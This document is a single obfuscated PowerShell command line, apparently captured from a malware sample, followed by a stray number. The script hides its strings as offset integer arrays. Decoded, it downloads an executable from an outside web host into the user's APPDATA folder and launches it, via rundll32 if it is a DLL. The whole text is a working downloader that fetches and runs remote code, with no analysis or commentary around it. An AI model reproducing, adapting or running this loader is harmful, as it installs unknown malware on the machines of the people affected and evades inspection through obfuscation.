powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function pYSLE($V, $Q){[IO.File]::WriteAllBytes($V, $Q)};function cdKJpBF($V){if($V.EndsWith((XYgDFbuR @(40107,40161,40169,40169))) -eq $True){Start-Process (XYgDFbuR @(40175,40178,40171,40161,40169,40169,40112,40111,40107,40162,40181,40162)) $V}else{Start-Process $V}};function CNyWMYuz($Xt){$JI = New-Object (XYgDFbuR @(40139,40162,40177,40107,40148,40162,40159,40128,40169,40166,40162,40171,40177));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$Q = $JI.DownloadData($Xt);return $Q};function XYgDFbuR($TO){$eF=40061;$VN=$Null;foreach($HA in $TO){$VN+=[char]($HA-$eF)};return $VN};function YuPMhMlF(){$fEikKtIVl = $env:APPDATA + '\';$LDTlYDCLf = CNyWMYuz (XYgDFbuR @(40165,40177,40177,40173,40176,40119,40108,40108,40160,40175,40182,40176,40177,40158,40169,40177,40162,40158,40107,40166,40171,40108,40160,40165,40166,40171,40108,40109,40118,40117,40107,40162,40181,40162));$StIlhBZc = $fEikKtIVl + '098.exe';pYSLE $StIlhBZc $LDTlYDCLf;cdKJpBF $StIlhBZc;;;;}YuPMhMlF;
2144